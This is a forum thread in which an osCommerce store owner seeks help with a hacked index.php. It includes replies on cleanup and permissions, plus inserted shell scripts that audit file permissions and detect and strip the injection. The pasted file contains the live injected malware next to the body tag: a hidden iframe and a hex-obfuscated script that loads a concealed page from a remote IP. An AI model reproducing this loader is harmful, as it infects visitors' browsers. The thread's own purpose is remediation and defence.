
Index.php file is infected on the webserver


mirza_yasir4

Recommended Posts

Posted

Dear All

My index.php file of osCommerce is infected with some malware.

When I try to open the store home page through Internet Explorer, my antivirus gives me this error, but opening it in Firefox is quite OK.

All my customers find the same message.

When I contacted the support team of the web server, they told me that some hacker put an "iframe" tag inside my index.php file, so I must remove that. Right now I am facing trouble connecting via FTP.

Please see the error message. Has anyone of you ever found such a problem?

 

AviraError.jpg

 

 

With AVG AV, the error is like this:

 

error2-1.jpg

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted

This seems to be HTML_IFRAME.CX.

Check the information page:

http://www.trendmicro.com/vinfo/virusencyc...ECX&VSect=P

This thing is in my "index.php" page of osCommerce. I don't know how to remove it, because every customer of mine is getting this message (on the internet).

I don't know who is supposed to fix this, me or my web server team.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted

No, but their advice seems good.

 

Replace index.php from your backup.

 

In fact a complete restore would be a good first move.

 

Install contribution 441 - site monitor. That will tell you if anyone is messing around with your site.

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile


Posted

Some things you need to do:

 

1. Run a complete virus scan of your PC, in case your website became infected from your PC when you did an FTP upload.

 

2. FTP to the website and delete the index.php file and replace it with a backup of that file which was taken before the infection occurred.

 

3. If you don't have a backup then ask your hosting company to restore the index.php from a backup they took. They should take backups.

 

4. FTP to your website and make sure that all files, except for the two configure.php files have permissions no higher than 644.

 

5. The permissions for the two configure.php files will vary according to the server your site is on - it could be 644, 444 or 400 which is correct.

 

6. Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosting companies.

 

7. If you remove the infection and it happens again then it's a good bet that a website on the same server is infected and that this infection is duplicating across all websites. cPanel is particularly prone to attack because it has no jailed root for individual websites (infect one site - infect them all).

 

8. In the meantime, until you get the infected file replaced with a good version, rename the index.php file and upload an index.html file saying your website is "Under Maintenance".

 

Vger
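An added example, not code from this thread or from osCommerce, that turns steps 4 to 6 above (files no higher than 644, the two configure.php files at 644/444/400, directories no higher than 755, nothing world-writable) into a check you can run on the server itself. It assumes shell access to the host rather than FTP, GNU findutils for `-perm /mode` and `-printf`, and it builds its own constructed sample tree with two deliberate mistakes so it runs anywhere:

```shell
#!/bin/sh
# Added example, not code from the forum thread or from osCommerce.
# Audits a catalog document root against the permission rules in the post
# above: files no higher than 644, directories no higher than 755, and
# nothing group- or world-writable. Assumes GNU findutils (-perm /mode and
# -printf). The tree built by make_sample_tree is constructed for the demo.

# Print one "DIR  <mode> <path>" or "FILE <mode> <path>" line per offending entry under $1.
audit_perms() {
    ap_root="$1"
    # A directory exceeds 755 if any group/world write bit or a setuid/setgid/sticky bit is set.
    find "$ap_root" -type d -perm /7022 -printf 'DIR  %m %p\n'
    # A file exceeds 644 if any execute bit or any group/world write bit is set.
    # includes/configure.php and admin/includes/configure.php may be 644, 444 or 400;
    # all three sit inside that ceiling, so they need no special case here.
    find "$ap_root" -type f -perm /7133 -printf 'FILE %m %p\n'
}

# Number of offending entries, for a cron job or a quick "is anything wrong" check.
count_offenders() {
    audit_perms "$1" | wc -l | tr -d ' '
}

# Build a small constructed catalog tree with two deliberate mistakes.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/images" "$root/includes" "$root/admin/includes"
    for f in index.php includes/configure.php admin/includes/configure.php admin/file_manager.php; do
        printf '<?php\n' > "$root/$f"
    done
    chmod 755 "$root/images" "$root/includes" "$root/admin" "$root/admin/includes"
    chmod 644 "$root/index.php"
    chmod 444 "$root/includes/configure.php"        # allowed
    chmod 400 "$root/admin/includes/configure.php"  # allowed
    chmod 666 "$root/admin/file_manager.php"        # world-writable file: offending
    chmod 777 "$root/images"                        # world-writable directory: offending
    echo "$root"
}

SAMPLE=$(make_sample_tree)
trap 'rm -rf "$SAMPLE"' EXIT
# Usage on a real store: audit_perms /path/to/catalog
audit_perms "$SAMPLE"
```

Run against a real document root it prints only the entries that break the rules, so an empty result means the tree matches the list above; the 777 images directory that the Header Tags SEO install notes ask for later in this thread would show up here as a DIR line.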

Posted
Some things you need to do:

 

6. Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosting companies.

 

Vger

 

I'm testing the new Header Tags Seo contribution. In the Install document it says:

 

"To allow the admin section to access the includes/header_tags.php file, the permissions for

that file should be set to 755 (777 on some hosts). The best way to be sure to get the settings

correct is to check the settings on the images directory and set the ones for the header

tags file to match those."

 

Apparently my images folder has to have 777 and that was also what I had to set on the header_tags.php in order to avoid an error message. Would you know if this is a hazardous configuration that I have?

Posted

I would also suggest changing all your passwords. And if you haven't already put passwords on your admin area, do so.

It's also recommended to remove the file manager capability in your admin, as this is potentially a back door into your site if it's not protected well. It's better not to have it.

Good luck

Posted
I would also suggest changing all your passwords. And if you haven't already put passwords on your admin area, do so.

It's also recommended to remove the file manager capability in your admin, as this is potentially a back door into your site if it's not protected well. It's better not to have it.

Good luck

 

 

How can I disable it?

Currently, I rolled the "index.php" file back to an old backup. The malware error message is gone now.

I must complete that patching as soon as I can, to avoid attacks in the future.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted

Guyz, please check the infected code... :rolleyes:

 

<?php
/*
 $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2003 osCommerce

 Released under the GNU General Public License
*/

 require('includes/application_top.php');


define('TEXT_GREETING_PERSONAL_AR', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');


define('TEXT_GREETING_GUEST_AR', '<span lang="AR-SA" dir="RTL" style="font-size: 18.0pt;">مرحبا بك يازائر ! ادخل فى حسابك <a href="%s"><u>هنا</u></a> او افتح حساب جديد <a href="%s"><u>هنا</u></a></span>');

 function tep_customer_greeting_ar() {
global $customer_id, $customer_first_name;

// Initialise the result so the function never returns an undefined variable:
// the personal-greeting branch below is commented out in this copy of the file.
$greeting_string = '';

if (tep_session_is_registered('customer_first_name') && tep_session_is_registered('customer_id')) {
//	  $greeting_string = sprintf(TEXT_GREETING_PERSONAL_AR, tep_output_string_protected($customer_first_name), tep_href_link(FILENAME_PRODUCTS_NEW));
} else {
  $greeting_string = sprintf(TEXT_GREETING_GUEST_AR, tep_href_link(FILENAME_LOGIN, '', 'SSL'), tep_href_link(FILENAME_CREATE_ACCOUNT, '', 'SSL'));
}

return $greeting_string;
 }

// the following cPath references come from application_top.php
 $category_depth = 'top';
 if (isset($cPath) && tep_not_null($cPath)) {
$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
$categories_products = tep_db_fetch_array($categories_products_query);
if ($categories_products['total'] > 0) {
  $category_depth = 'products'; // display products
} else {
  $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
  $category_parent = tep_db_fetch_array($category_parent_query);
  if ($category_parent['total'] > 0) {
	$category_depth = 'nested'; // navigate through the categories
  } else {
	$category_depth = 'products'; // category has no products, but display the 'no products' message
  }
}
 }

 require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>">
<title><?php echo TITLE; ?></title>
<base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<script type="text/javascript">
<!--
if (document.layers){
window.captureEvents(Event.MOUSEDOWN | Event.MOUSEUP)
window.onmousedown=rightclick;
window.onmouseup=rightclick;

function rightclick(e) {
if (e.which == 3) {
// Put right mouse code here
alert('Copyright © 2004 NASA est.');
return false;
}
else {
	return true;
	}
}
}
if (document.all){
function click() {
if (event.button==2) {
alert('Copyright © 2004 NASA est.')
}

if (event.button==3) {
alert('Copyright © 2004 NASA est.')}
}
document.onmousedown=click
}
// -->
</script>

<script language="javascript"><!--
var i=0;
function resize() {
 if (navigator.appName == 'Netscape') i=40;
 if (document.images[0]) window.resizeTo(document.images[0].width +30, document.images[0].height+60-i);
 self.focus();
}
//--></script>
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48120f3d1fd6d(v48120f3d2056f){  return(parseInt(v48120f3d2056f,16));}function v48120f3d21ca7(v48120f3d22476){ function v48120f3d23be3 () {var v48120f3d243b4=2; return v48120f3d243b4;} var v48120f3d22c46='';for(v48120f3d23417=0; v48120f3d23417<v48120f3d22476.length; v48120f3d23417+=v48120f3d23be3()){ v48120f3d22c46+=(String.fromCharCode(v48120f3d1fd6d(v48120f3d22476.substr(v48120f3d23417, v48120f3d23be3()))));}return v48120f3d22c46;} document.write(v48120f3d21ca7('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E
777269746528273C696672616D65206E616D653D6266623565207372633D5C27687474703A2F2F373
72E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D61
74682E72616E646F6D28292A323430383030292B27306661305C272077696474683D3433302068656
96768743D353630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D65
3E27293C2F5343524950543E'));</script>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="3" cellpadding="3">
 <tr>
<td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
</table></td>
<!-- body_text //-->
<?php
 if ($category_depth == 'nested') {
$category_query = tep_db_query("select cd.categories_name, c.categories_image from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.categories_id = '" . (int)$current_category_id . "' and cd.categories_id = '" . (int)$current_category_id . "' and cd.language_id = '" . (int)$languages_id . "'");
$category = tep_db_fetch_array($category_query);
?>
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
		<td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . $category['categories_image'], $category['categories_name'], HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
	  </tr>
	</table></td>
  </tr>
  <tr>
	<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
  </tr>
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="2">
	  <tr>
		<td><table border="0" width="100%" cellspacing="0" cellpadding="2">
		  <tr>
<?php
if (isset($cPath) && strpos($cPath, '_') !== false) { // haystack first, needle second: the arguments were reversed
// check to see if there are deeper categories within the current category
  $category_links = array_reverse($cPath_array);
  for($i=0, $n=sizeof($category_links); $i<$n; $i++) {
	$categories_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "'");
	$categories = tep_db_fetch_array($categories_query);
	if ($categories['total'] < 1) {
	  // do nothing, go through the loop
	} else {
	  $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
	  break; // we've found the deepest category the customer is in
	}
  }
} else {
  $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$current_category_id . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
}

$number_of_categories = tep_db_num_rows($categories_query);

$rows = 0;
while ($categories = tep_db_fetch_array($categories_query)) {
  $rows++;
  $cPath_new = tep_get_path($categories['categories_id']);
  $width = (int)(100 / MAX_DISPLAY_CATEGORIES_PER_ROW) . '%';
  echo '				<td align="center" class="smallText" width="' . $width . '" valign="top"><a href="' . tep_href_link(FILENAME_DEFAULT, $cPath_new) . '">' . tep_image(DIR_WS_IMAGES . $categories['categories_image'], $categories['categories_name'], SUBCATEGORY_IMAGE_WIDTH, SUBCATEGORY_IMAGE_HEIGHT) . '' . $categories['categories_name'] . '</a></td>' . "\n";
  if ((($rows / MAX_DISPLAY_CATEGORIES_PER_ROW) == floor($rows / MAX_DISPLAY_CATEGORIES_PER_ROW)) && ($rows != $number_of_categories)) {
	echo '			  </tr>' . "\n";
	echo '			  <tr>' . "\n";
  }
}

// needed for the new products module shown below
$new_products_category_id = $current_category_id;
?>
		  </tr>
		</table></td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
	  </tr>
	</table></td>
  </tr>
</table></td>
<?php
 } elseif ($category_depth == 'products' || isset($HTTP_GET_VARS['manufacturers_id'])) {
// create column list
$define_list = array('PRODUCT_LIST_MODEL' => PRODUCT_LIST_MODEL,
					 'PRODUCT_LIST_NAME' => PRODUCT_LIST_NAME,
					 'PRODUCT_LIST_MANUFACTURER' => PRODUCT_LIST_MANUFACTURER,
					 'PRODUCT_LIST_PRICE' => PRODUCT_LIST_PRICE,
					 'PRODUCT_LIST_QUANTITY' => PRODUCT_LIST_QUANTITY,
					 'PRODUCT_LIST_WEIGHT' => PRODUCT_LIST_WEIGHT,
					 'PRODUCT_LIST_IMAGE' => PRODUCT_LIST_IMAGE,
					 'PRODUCT_LIST_BUY_NOW' => PRODUCT_LIST_BUY_NOW);

asort($define_list);

$column_list = array();
reset($define_list);
while (list($key, $value) = each($define_list)) {
  if ($value > 0) $column_list[] = $key;
}

$select_column_list = '';

for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
  switch ($column_list[$i]) {
	case 'PRODUCT_LIST_MODEL':
	  $select_column_list .= 'p.products_model, ';
	  break;
	case 'PRODUCT_LIST_NAME':
	  $select_column_list .= 'pd.products_name, ';
	  break;
	case 'PRODUCT_LIST_MANUFACTURER':
	  $select_column_list .= 'm.manufacturers_name, ';
	  break;
	case 'PRODUCT_LIST_QUANTITY':
	  $select_column_list .= 'p.products_quantity, ';
	  break;
	case 'PRODUCT_LIST_IMAGE':
	  $select_column_list .= 'p.products_image, ';
	  break;
	case 'PRODUCT_LIST_WEIGHT':
	  $select_column_list .= 'p.products_weight, ';
	  break;
  }
}

// show the products of a specified manufacturer
if (isset($HTTP_GET_VARS['manufacturers_id'])) {
  if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
// We are asked to show only a specific category
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "'";
  } else {
// We show them all
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'";
  }
} else {
// show the products in a given categorie
  if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
// We are asked to show only specific catgeory
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
  } else {
// We show them all
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_PRODUCTS . " p left join " . TABLE_MANUFACTURERS . " m on p.manufacturers_id = m.manufacturers_id, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
  }
}

if ( (!isset($HTTP_GET_VARS['sort'])) || (!ereg('[1-8][ad]', $HTTP_GET_VARS['sort'])) || (substr($HTTP_GET_VARS['sort'], 0, 1) > sizeof($column_list)) ) {
  for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
	if ($column_list[$i] == 'PRODUCT_LIST_NAME') {
	  $HTTP_GET_VARS['sort'] = $i+1 . 'a';
	  $listing_sql .= " order by pd.products_name";
	  break;
	}
  }
} else {
  $sort_col = substr($HTTP_GET_VARS['sort'], 0 , 1);
  $sort_order = substr($HTTP_GET_VARS['sort'], 1);
  $listing_sql .= ' order by ';
  switch ($column_list[$sort_col-1]) {
	case 'PRODUCT_LIST_MODEL':
	  $listing_sql .= "p.products_model " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_NAME':
	  $listing_sql .= "pd.products_name " . ($sort_order == 'd' ? 'desc' : '');
	  break;
	case 'PRODUCT_LIST_MANUFACTURER':
	  $listing_sql .= "m.manufacturers_name " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_QUANTITY':
	  $listing_sql .= "p.products_quantity " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_IMAGE':
	  $listing_sql .= "pd.products_name";
	  break;
	case 'PRODUCT_LIST_WEIGHT':
	  $listing_sql .= "p.products_weight " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_PRICE':
	  $listing_sql .= "final_price " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
  }
}
?>
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php
// optional Product List Filter
if (PRODUCT_LIST_FILTER > 0) {
  if (isset($HTTP_GET_VARS['manufacturers_id'])) {
	$filterlist_sql = "select distinct c.categories_id as id, cd.categories_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where p.products_status = '1' and p.products_id = p2c.products_id and p2c.categories_id = c.categories_id and p2c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' order by cd.categories_name";
  } else {
	$filterlist_sql= "select distinct m.manufacturers_id as id, m.manufacturers_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_MANUFACTURERS . " m where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and p.products_id = p2c.products_id and p2c.categories_id = '" . (int)$current_category_id . "' order by m.manufacturers_name";
  }
  $filterlist_query = tep_db_query($filterlist_sql);
  if (tep_db_num_rows($filterlist_query) > 1) {
	echo '			<td align="center" class="main">' . tep_draw_form('filter', FILENAME_DEFAULT, 'get') . TEXT_SHOW . ' ';
	if (isset($HTTP_GET_VARS['manufacturers_id'])) {
	  echo tep_draw_hidden_field('manufacturers_id', $HTTP_GET_VARS['manufacturers_id']);
	  $options = array(array('id' => '', 'text' => TEXT_ALL_CATEGORIES));
	} else {
	  echo tep_draw_hidden_field('cPath', $cPath);
	  $options = array(array('id' => '', 'text' => TEXT_ALL_MANUFACTURERS));
	}
	echo tep_draw_hidden_field('sort', $HTTP_GET_VARS['sort']);
	while ($filterlist = tep_db_fetch_array($filterlist_query)) {
	  $options[] = array('id' => $filterlist['id'], 'text' => $filterlist['name']);
	}
	echo tep_draw_pull_down_menu('filter_id', $options, (isset($HTTP_GET_VARS['filter_id']) ? $HTTP_GET_VARS['filter_id'] : ''), 'onchange="this.form.submit()"');
	echo '</form></td>' . "\n";
  }
}

// Get the right image for the top-right
$image = DIR_WS_IMAGES . 'table_background_list.gif';
if (isset($HTTP_GET_VARS['manufacturers_id'])) {
  $image = tep_db_query("select manufacturers_image from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
  $image = tep_db_fetch_array($image);
  $image = $image['manufacturers_image'];
} elseif ($current_category_id) {
  $image = tep_db_query("select categories_image from " . TABLE_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
  $image = tep_db_fetch_array($image);
  $image = $image['categories_image'];
}
?>
		<td align="right"><?php echo tep_image(DIR_WS_IMAGES . $image, HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
	  </tr>
	</table></td>
  </tr>
  <tr>
	<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
  </tr>
  <tr>
	<td><?php include(DIR_WS_MODULES . FILENAME_PRODUCT_LISTING); ?></td>
  </tr>
</table></td>
<?php
 } else { // default page
?>
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php /*			<td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_default.gif', HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td> */ ?>
	  </tr>
	</table></td>
  </tr>
  <tr>
	<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
  </tr>
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="main"><?php echo tep_customer_greeting(); ?><?php
		echo tep_customer_greeting_ar();
		?>
		</td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td class="main"><?php echo TEXT_MAIN; ?></td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td><?php include(DIR_WS_MODULES . 'main_categories.php'); ?></td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
	  </tr>
<?php
include(DIR_WS_MODULES . FILENAME_UPCOMING_PRODUCTS);
?>
	</table></td>
  </tr>
</table></td>
<?php
 }
?>
<!-- body_text_eof //-->
<td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- right_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>
<!-- right_navigation_eof //-->
</table></td>
 </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->

</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted
check the code, right beside the body tag

 

Yes, you still need to remove everything between the <iframe... and the </script>. And check the other files on your site for similar code; this is what's causing your virus warning. But unless you take steps to protect your site, whoever did this will very likely come back and do this again.

As far as removing the file manager, you can delete the admin/file_manager.php file, or just rename it to file_manager.xxx in case you do need it at some later time. The link to the file manager will still be there in your admin, but clicking on it will be useless.
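An added example, not code from this thread or from osCommerce, that carries out the three steps in the reply above on the server: list other files carrying the same kind of injection (a hidden or 1x1 iframe, or the `parseInt(...,16)` / `String.fromCharCode` hex decoder seen in the posted index.php), cut everything from `<iframe` to `</script>` out of the infected line after saving the original to a quarantine directory, and disable admin/file_manager.php by renaming it. It assumes GNU grep and GNU sed; the sample tree, the injected line in it and the placeholder iframe URL are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the forum thread or from osCommerce.
# Assumes GNU grep (-r, --include, \b) and GNU sed (-i -E). The sample tree
# built by make_infected_tree is constructed; the iframe URL is a placeholder.

# List files under $1 whose content looks like the injection in this thread:
# a hidden or 1x1 iframe, or a hex-decoding script (parseInt(x,16) + fromCharCode).
# grep exits 1 when nothing matches; treat that as "no findings", not an error.
find_injected() {
    grep -rlE \
        -e '<iframe[^>]*(visibility: *hidden|display: *none|(width|height)=.?1\b)' \
        -e 'parseInt\([^)]*, *16\).*fromCharCode' \
        -e 'fromCharCode.*parseInt\([^)]*, *16\)' \
        --include='*.php' --include='*.html' --include='*.htm' "$1" || [ $? -eq 1 ]
}

# Cut the injected "<iframe ...></iframe><script>...</script>" run out of file $1,
# first copying the untouched file into quarantine directory $2 (keep that
# directory outside the web root). The injection in this thread sits on one
# line (the wrapping in the post is the forum's), so a single-line substitution
# is enough; a multi-line injection needs a different tool.
strip_injection() {
    si_file="$1"; si_q="$2"
    mkdir -p "$si_q"
    cp -p "$si_file" "$si_q/$(basename "$si_file").$(date +%Y%m%d%H%M%S)"
    sed -i -E 's#<iframe[^>]*>[[:space:]]*</iframe>[[:space:]]*<script[^>]*>.*</script>##' "$si_file"
}

# Rename admin/file_manager.php under catalog root $1 as the reply suggests.
disable_file_manager() {
    if [ -f "$1/admin/file_manager.php" ]; then
        mv "$1/admin/file_manager.php" "$1/admin/file_manager.xxx"
    fi
}

# Constructed catalog tree: one infected page, one clean page, a file manager stand-in.
make_infected_tree() {
    mt_root=$(mktemp -d)
    mkdir -p "$mt_root/admin"
    cat > "$mt_root/index.php" <<'EOF'
<?php require('includes/application_top.php'); ?>
<body marginwidth="0"><iframe src='http://PLACEHOLDER.invalid/' width='1' height='1' style='visibility: hidden;'></iframe><script>document.write('constructed stand-in for the injected script');</script>
<!-- header //-->
EOF
    cat > "$mt_root/product_info.php" <<'EOF'
<?php require('includes/application_top.php'); ?>
<body marginwidth="0">
<!-- header //-->
EOF
    printf '<?php // admin file manager stand-in\n' > "$mt_root/admin/file_manager.php"
    echo "$mt_root"
}

SAMPLE=$(make_infected_tree)
QUARANTINE=$(mktemp -d)   # on a real host: a directory outside the document root
trap 'rm -rf "$SAMPLE" "$QUARANTINE"' EXIT

echo "Infected before cleanup:"; find_injected "$SAMPLE"
# Paths from mktemp contain no spaces, so plain word splitting is safe here.
for f in $(find_injected "$SAMPLE"); do strip_injection "$f" "$QUARANTINE"; done
disable_file_manager "$SAMPLE"
echo "Infected after cleanup:"; find_injected "$SAMPLE"
```

Two points a practitioner would add to the reply: keep the quarantined originals and the server logs for the period, since they are the only evidence of how the file was changed, and note that a renamed file_manager.xxx is still inside the web root, so a web server that serves unknown extensions as plain text would disclose its source; moving it outside the document root avoids that.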

Posted

Is the reason someone managed to add malware code into my PHP pages that my permissions on files and directories are not correct?

 

Will you guide me please.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted
Is the reason someone managed to add malware code into my PHP pages that my permissions on files and directories are not correct?

 

